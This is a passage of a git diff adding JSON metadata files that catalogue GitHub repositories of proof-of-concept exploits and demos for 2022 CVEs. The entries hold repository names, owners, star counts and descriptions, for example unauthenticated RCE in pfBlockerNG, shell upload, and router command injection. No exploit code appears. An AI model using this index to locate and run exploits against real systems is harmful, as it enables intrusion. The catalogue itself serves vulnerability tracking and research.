+] \ No newline at end of file diff --git a/2022/CVE-2022-3168.json b/2022/CVE-2022-3168.json new file mode 100644 index 0000000000..2940cd2a93 --- /dev/null +++ b/2022/CVE-2022-3168.json @@ -0,0 +1,33 @@ +[ + { + "id": 534634523, + "name": "CVE-2022-3168-adb-unexpected-reverse-forwards", + "full_name": "irsl\/CVE-2022-3168-adb-unexpected-reverse-forwards", + "owner": { + "login": "irsl", + "id": 6357121, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6357121?v=4", + "html_url": "https:\/\/github.com\/irsl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/irsl\/CVE-2022-3168-adb-unexpected-reverse-forwards", + "description": "Proof of concept code to exploit flaw in adb that allowed opening network connections on the host to arbitrary destinations", + "fork": false, + "created_at": "2022-09-09T12:31:56Z", + "updated_at": "2022-10-25T18:56:10Z", + "pushed_at": "2022-09-09T12:39:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31691.json b/2022/CVE-2022-31691.json new file mode 100644 index 0000000000..768d97d5bc --- /dev/null +++ b/2022/CVE-2022-31691.json @@ -0,0 +1,33 @@ +[ + { + "id": 567279826, + "name": "CVE-2022-31691", + "full_name": "SpindleSec\/CVE-2022-31691", + "owner": { + "login": "SpindleSec", + "id": 114083317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114083317?v=4", + "html_url": "https:\/\/github.com\/SpindleSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpindleSec\/CVE-2022-31691", + "description": "A write-up of my (so far inconclusive) look into CVE-2022-31691", + "fork": false, + "created_at": "2022-11-17T13:09:03Z", + "updated_at": "2022-11-18T01:18:47Z", + "pushed_at": "2022-11-17T15:19:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31692.json b/2022/CVE-2022-31692.json new file mode 100644 index 0000000000..0798265db9 --- /dev/null +++ b/2022/CVE-2022-31692.json @@ -0,0 +1,64 @@ +[ + { + "id": 561229376, + "name": "cve-2022-31692", + "full_name": "SpindleSec\/cve-2022-31692", + "owner": { + "login": "SpindleSec", + "id": 114083317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114083317?v=4", + "html_url": "https:\/\/github.com\/SpindleSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpindleSec\/cve-2022-31692", + "description": "A project demonstrating an app that is vulnerable to Spring Security authorization bypass CVE-2022-31692", + "fork": false, + "created_at": "2022-11-03T08:35:20Z", + "updated_at": "2024-08-12T20:28:09Z", + "pushed_at": "2022-11-07T11:00:43Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 36, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 711577493, + "name": "cve-2022-31692", + "full_name": "hotblac\/cve-2022-31692", + "owner": { + "login": "hotblac", + "id": 4406140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4406140?v=4", + "html_url": "https:\/\/github.com\/hotblac", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hotblac\/cve-2022-31692", + "description": "Demonstration of CVE-2022-31692 authorization bypass in Spring Security", + "fork": false, + "created_at": "2023-10-29T17:31:23Z", + "updated_at": "2023-10-29T17:31:49Z", + "pushed_at": "2023-12-02T11:23:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31705.json b/2022/CVE-2022-31705.json new file mode 100644 index 0000000000..d3e03fd4f7 --- /dev/null +++ b/2022/CVE-2022-31705.json @@ -0,0 +1,33 @@ +[ + { + "id": 586726069, + "name": "cve-2022-31705", + "full_name": "s0duku\/cve-2022-31705", + "owner": { + "login": "s0duku", + "id": 83897807, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83897807?v=4", + "html_url": "https:\/\/github.com\/s0duku", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s0duku\/cve-2022-31705", + "description": "CVE-2022-31705 (Geekpwn 2022 Vmware EHCI OOB) POC ", + "fork": false, + "created_at": "2023-01-09T04:27:15Z", + "updated_at": "2024-08-12T20:29:15Z", + "pushed_at": "2023-01-09T08:19:27Z", + "stargazers_count": 118, + "watchers_count": 118, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 118, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3172.json b/2022/CVE-2022-3172.json new file mode 100644 index 0000000000..d10537ef29 --- /dev/null +++ b/2022/CVE-2022-3172.json @@ -0,0 +1,33 @@ +[ + { + "id": 780911426, + "name": "CVE-2022-3172", + "full_name": "UgOrange\/CVE-2022-3172", + "owner": { + "login": "UgOrange", + "id": 28263639, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28263639?v=4", + "html_url": "https:\/\/github.com\/UgOrange", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UgOrange\/CVE-2022-3172", + "description": null, + "fork": false, + "created_at": "2024-04-02T11:53:54Z", + "updated_at": "2024-04-02T11:54:42Z", + "pushed_at": "2024-04-02T11:54:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31749.json b/2022/CVE-2022-31749.json new file mode 100644 index 0000000000..ccfe37f01d --- /dev/null +++ b/2022/CVE-2022-31749.json @@ -0,0 +1,69 @@ +[ + { + "id": 504287436, + "name": "hook", + "full_name": "jbaines-r7\/hook", + "owner": { + "login": "jbaines-r7", + "id": 91965877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91965877?v=4", + "html_url": "https:\/\/github.com\/jbaines-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jbaines-r7\/hook", + "description": "Proof of Concept for WatchGuard Authenticated Arbitrary File Read (CVE-2022-31749)", + "fork": false, + "created_at": "2022-06-16T19:51:28Z", + "updated_at": "2024-08-12T20:24:13Z", + "pushed_at": "2022-06-16T20:32:52Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-31749", + "exploit", + "poc", + "watchguard" + ], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 511068230, + "name": "cve-2022-31749", + "full_name": "iveresk\/cve-2022-31749", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/cve-2022-31749", + "description": "Simple PoC-checker for CVE-2022-31749 by 1vere$k", + "fork": false, + "created_at": "2022-07-06T09:15:49Z", + "updated_at": "2022-07-06T12:34:20Z", + "pushed_at": "2022-07-06T12:35:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31793.json b/2022/CVE-2022-31793.json new file mode 100644 index 0000000000..b27102b38c --- /dev/null +++ b/2022/CVE-2022-31793.json @@ -0,0 +1,33 @@ +[ + { + "id": 526427861, + "name": "CVE-2022-31793", + "full_name": "xpgdgit\/CVE-2022-31793", + "owner": { + "login": "xpgdgit", + "id": 30492998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30492998?v=4", + "html_url": "https:\/\/github.com\/xpgdgit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xpgdgit\/CVE-2022-31793", + "description": null, + "fork": false, + "created_at": "2022-08-19T01:42:08Z", + "updated_at": "2023-04-06T15:16:39Z", + "pushed_at": "2022-08-19T01:55:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31798.json b/2022/CVE-2022-31798.json new file mode 100644 index 0000000000..2851616b43 --- /dev/null +++ b/2022/CVE-2022-31798.json @@ -0,0 +1,33 @@ +[ + { + "id": 540472741, + "name": "CVE-2022-31798", + "full_name": "omarhashem123\/CVE-2022-31798", + "owner": { + "login": "omarhashem123", + "id": 70245773, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70245773?v=4", + "html_url": "https:\/\/github.com\/omarhashem123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omarhashem123\/CVE-2022-31798", + "description": "CVE-2022-31798 Proof of Concept", + "fork": false, + "created_at": "2022-09-23T14:13:26Z", + "updated_at": "2022-09-27T04:16:14Z", + "pushed_at": "2022-11-06T09:59:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31814.json b/2022/CVE-2022-31814.json new file mode 100644 index 0000000000..21fd8132dd --- /dev/null +++ b/2022/CVE-2022-31814.json @@ -0,0 +1,265 @@ +[ + { + "id": 538083210, + "name": "SenselessViolence", + "full_name": "EvergreenCartoons\/SenselessViolence", + "owner": { + "login": "EvergreenCartoons", + "id": 113829980, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113829980?v=4", + "html_url": "https:\/\/github.com\/EvergreenCartoons", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EvergreenCartoons\/SenselessViolence", + "description": "CVE-2022-31814 Exploitation Toolkit.", + "fork": false, + "created_at": "2022-09-18T11:10:04Z", + "updated_at": "2024-08-10T07:10:23Z", + "pushed_at": "2022-09-21T13:41:29Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "hacking", + "pfsense", + "security-tools" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 605094197, + "name": "CVE-2022-31814", + "full_name": "Madliife0\/CVE-2022-31814", + "owner": { + "login": "Madliife0", + "id": 64816845, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64816845?v=4", + "html_url": "https:\/\/github.com\/Madliife0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Madliife0\/CVE-2022-31814", + "description": null, + "fork": false, + "created_at": "2023-02-22T12:38:13Z", + "updated_at": "2023-02-22T12:38:13Z", + "pushed_at": "2023-02-22T12:38:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 608172527, + "name": "CVE-2022-31814", + "full_name": "TheUnknownSoul\/CVE-2022-31814", + "owner": { + "login": "TheUnknownSoul", + "id": 58050201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58050201?v=4", + "html_url": "https:\/\/github.com\/TheUnknownSoul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheUnknownSoul\/CVE-2022-31814", + "description": null, + "fork": false, + "created_at": "2023-03-01T13:24:29Z", + "updated_at": "2023-03-01T16:14:01Z", + "pushed_at": "2023-03-03T08:22:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 609702147, + "name": "RCE", + "full_name": "drcayber\/RCE", + "owner": { + "login": "drcayber", + "id": 101327574, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101327574?v=4", + "html_url": "https:\/\/github.com\/drcayber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/drcayber\/RCE", + "description": "CVE-2022-31814", + "fork": false, + "created_at": "2023-03-05T00:56:14Z", + "updated_at": "2023-09-19T17:16:18Z", + "pushed_at": "2023-03-05T01:07:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bug", + "exploit", + "hunting", + "python", + "rce", + "rce-exploit", + "rce-scanner", + "web", + "webapplication" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 618996369, + "name": "CVE-2022-31814", + "full_name": "Chocapikk\/CVE-2022-31814", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-31814", + "description": "pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)", + "fork": false, + "created_at": "2023-03-26T00:18:04Z", + "updated_at": "2024-09-08T03:28:15Z", + "pushed_at": "2023-03-26T00:25:48Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 619242757, + "name": "CVE-2022-31814", + "full_name": "dkstar11q\/CVE-2022-31814", + "owner": { + "login": "dkstar11q", + "id": 123830677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123830677?v=4", + "html_url": "https:\/\/github.com\/dkstar11q", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dkstar11q\/CVE-2022-31814", + "description": "pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)", + "fork": false, + "created_at": "2023-03-26T17:22:40Z", + "updated_at": "2024-08-10T07:10:31Z", + "pushed_at": "2023-03-26T00:25:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 832573377, + "name": "CVE-2022-31814", + "full_name": "Laburity\/CVE-2022-31814", + "owner": { + "login": "Laburity", + "id": 130553966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130553966?v=4", + "html_url": "https:\/\/github.com\/Laburity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Laburity\/CVE-2022-31814", + "description": "Updated Exploit - pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)", + "fork": false, + "created_at": "2024-07-23T09:44:46Z", + "updated_at": "2024-09-18T22:48:05Z", + "pushed_at": "2024-07-23T10:03:08Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 23, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 841455990, + "name": "CVE-2022-31814", + "full_name": "ArunHAtter\/CVE-2022-31814", + "owner": { + "login": "ArunHAtter", + "id": 53938283, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53938283?v=4", + "html_url": "https:\/\/github.com\/ArunHAtter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ArunHAtter\/CVE-2022-31814", + "description": "This script is a proof-of-concept exploit for pfBlockerNG <= 2.1.4_26 that allows for remote code execution. It takes a single target URL or a list of URLs, tries to upload a shell using multiple payloads, executes a command, and then deletes the shell.", + "fork": false, + "created_at": "2024-08-12T12:50:48Z", + "updated_at": "2024-08-12T12:57:41Z", + "pushed_at": "2024-08-12T12:57:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31854.json b/2022/CVE-2022-31854.json new file mode 100644 index 0000000000..1603ee82ab --- /dev/null +++ b/2022/CVE-2022-31854.json @@ -0,0 +1,33 @@ +[ + { + "id": 511582709, + "name": "CVE-2022-31854", + "full_name": "Vikaran101\/CVE-2022-31854", + "owner": { + "login": "Vikaran101", + "id": 108887353, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108887353?v=4", + "html_url": "https:\/\/github.com\/Vikaran101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vikaran101\/CVE-2022-31854", + "description": "CodoForum v5.1 - File Upload Bypass to RCE (Authenticated) exploit code", + "fork": false, + "created_at": "2022-07-07T15:33:07Z", + "updated_at": "2023-04-17T14:26:27Z", + "pushed_at": "2022-07-07T15:36:45Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31889.json b/2022/CVE-2022-31889.json new file mode 100644 index 0000000000..5441d1453c --- /dev/null +++ b/2022/CVE-2022-31889.json @@ -0,0 +1,33 @@ +[ + { + "id": 603422212, + "name": "CVE-2022-31889", + "full_name": "reewardius\/CVE-2022-31889", + "owner": { + "login": "reewardius", + "id": 68978608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68978608?v=4", + "html_url": "https:\/\/github.com\/reewardius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reewardius\/CVE-2022-31889", + "description": null, + "fork": false, + "created_at": "2023-02-18T13:14:53Z", + "updated_at": "2023-02-18T13:14:53Z", + "pushed_at": "2023-02-18T13:25:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31890.json b/2022/CVE-2022-31890.json new file mode 100644 index 0000000000..27e7f86ebf --- /dev/null +++ b/2022/CVE-2022-31890.json @@ -0,0 +1,33 @@ +[ + { + "id": 603412932, + "name": "CVE-2022-31890", + "full_name": "reewardius\/CVE-2022-31890", + "owner": { + "login": "reewardius", + "id": 68978608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68978608?v=4", + "html_url": "https:\/\/github.com\/reewardius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reewardius\/CVE-2022-31890", + "description": null, + "fork": false, + "created_at": "2023-02-18T12:40:45Z", + "updated_at": "2023-09-13T12:24:53Z", + "pushed_at": "2023-02-18T13:09:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31897.json b/2022/CVE-2022-31897.json new file mode 100644 index 0000000000..9ea70f4631 --- /dev/null +++ b/2022/CVE-2022-31897.json @@ -0,0 +1,33 @@ +[ + { + "id": 514552098, + "name": "CVE-2022-31897", + "full_name": "angelopioamirante\/CVE-2022-31897", + "owner": { + "login": "angelopioamirante", + "id": 38589929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38589929?v=4", + "html_url": "https:\/\/github.com\/angelopioamirante", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/angelopioamirante\/CVE-2022-31897", + "description": "Zoo Management System 1.0 - Reflected Cross-Site-Scripting (XSS)", + "fork": false, + "created_at": "2022-07-16T10:55:32Z", + "updated_at": "2022-07-16T10:59:46Z", + "pushed_at": "2022-07-16T10:59:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31898.json b/2022/CVE-2022-31898.json new file mode 100644 index 0000000000..232c7f3063 --- /dev/null +++ b/2022/CVE-2022-31898.json @@ -0,0 +1,38 @@ +[ + { + "id": 564618463, + "name": "cve-2022-31898", + "full_name": "gigaryte\/cve-2022-31898", + "owner": { + "login": "gigaryte", + "id": 8154801, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8154801?v=4", + "html_url": "https:\/\/github.com\/gigaryte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gigaryte\/cve-2022-31898", + "description": "Exploit POC code for CVE-2022-31898, a command injection for GL-iNet routers with firmware below 3.215", + "fork": false, + "created_at": "2022-11-11T05:11:14Z", + "updated_at": "2023-12-11T06:17:46Z", + "pushed_at": "2022-11-17T12:58:20Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve-2022-31898", + "exploit", + "gl-inet" + ], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31901.json b/2022/CVE-2022-31901.json new file mode 100644 index 0000000000..ccdfb0f78d --- /dev/null +++ b/2022/CVE-2022-31901.json @@ -0,0 +1,33 @@ +[ + { + "id": 512699304, + "name": "CVE-2022-31901", + "full_name": "CDACesec\/CVE-2022-31901", + "owner": { + "login": "CDACesec", + "id": 102668343, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102668343?v=4", + "html_url": "https:\/\/github.com\/CDACesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CDACesec\/CVE-2022-31901", + "description": null, + "fork": false, + "created_at": "2022-07-11T09:47:16Z", + "updated_at": "2023-01-09T05:16:21Z", + "pushed_at": "2023-02-01T11:10:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31902.json b/2022/CVE-2022-31902.json new file mode 100644 index 0000000000..1c1f2adb8b --- /dev/null +++ b/2022/CVE-2022-31902.json @@ -0,0 +1,33 @@ +[ + { + "id": 512712652, + "name": "CVE-2022-31902", + "full_name": "CDACesec\/CVE-2022-31902", + "owner": { + "login": "CDACesec", + "id": 102668343, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102668343?v=4", + "html_url": "https:\/\/github.com\/CDACesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CDACesec\/CVE-2022-31902", + "description": null, + "fork": false, + "created_at": "2022-07-11T10:32:08Z", + "updated_at": "2023-02-18T11:24:59Z", + "pushed_at": "2023-02-01T11:09:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31983.json b/2022/CVE-2022-31983.json new file mode 100644 index 0000000000..42ad2905bb --- /dev/null +++ b/2022/CVE-2022-31983.json @@ -0,0 +1,33 @@ +[ + { + "id": 502646581, + "name": "CVE-2022-31983", + "full_name": "mel1huc4r\/CVE-2022-31983", + "owner": { + "login": "mel1huc4r", + "id": 97701014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97701014?v=4", + "html_url": "https:\/\/github.com\/mel1huc4r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mel1huc4r\/CVE-2022-31983", + "description": null, + "fork": false, + "created_at": "2022-06-12T14:59:01Z", + "updated_at": "2022-06-12T14:59:01Z", + "pushed_at": "2022-06-12T15:01:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32013.json b/2022/CVE-2022-32013.json new file mode 100644 index 0000000000..2b5a74e2a8 --- /dev/null +++ b/2022/CVE-2022-32013.json @@ -0,0 +1,33 @@ +[ + { + "id": 502620615, + "name": "CVE-2022-32013", + "full_name": "heavenswill\/CVE-2022-32013", + "owner": { + "login": "heavenswill", + "id": 98050318, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98050318?v=4", + "html_url": "https:\/\/github.com\/heavenswill", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/heavenswill\/CVE-2022-32013", + "description": null, + "fork": false, + "created_at": "2022-06-12T13:15:58Z", + "updated_at": "2022-06-12T13:15:58Z", + "pushed_at": "2022-06-12T13:31:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32060.json b/2022/CVE-2022-32060.json new file mode 100644 index 0000000000..be483aa82c --- /dev/null +++ b/2022/CVE-2022-32060.json @@ -0,0 +1,33 @@ +[ + { + "id": 569794902, + "name": "CVE-2022-32060", + "full_name": "bypazs\/CVE-2022-32060", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2022-32060", + "description": "An arbitrary file upload vulnerability in the Update Branding Settings component of Snipe-IT v6.0.2 allows attackers to execute arbitrary code via a crafted file.", + "fork": false, + "created_at": "2022-11-23T16:20:24Z", + "updated_at": "2022-12-10T11:11:55Z", + "pushed_at": "2022-11-23T16:31:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32073.json b/2022/CVE-2022-32073.json new file mode 100644 index 0000000000..2f887d8588 --- /dev/null +++ b/2022/CVE-2022-32073.json @@ -0,0 +1,33 @@ +[ + { + "id": 571969450, + "name": "project_BIT_nmap_script", + "full_name": "mgregus\/project_BIT_nmap_script", + "owner": { + "login": "mgregus", + "id": 56076866, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56076866?v=4", + "html_url": "https:\/\/github.com\/mgregus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mgregus\/project_BIT_nmap_script", + "description": "Nmap .nse script to scan for CVE-2022-32073 in wolfssh", + "fork": false, + "created_at": "2022-11-29T09:28:18Z", + "updated_at": "2022-12-08T10:18:19Z", + "pushed_at": "2022-11-29T12:12:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32074.json b/2022/CVE-2022-32074.json new file mode 100644 index 0000000000..09de32279e --- /dev/null +++ b/2022/CVE-2022-32074.json @@ -0,0 +1,33 @@ +[ + { + "id": 603423307, + "name": "CVE-2022-32074", + "full_name": "reewardius\/CVE-2022-32074", + "owner": { + "login": "reewardius", + "id": 68978608, + 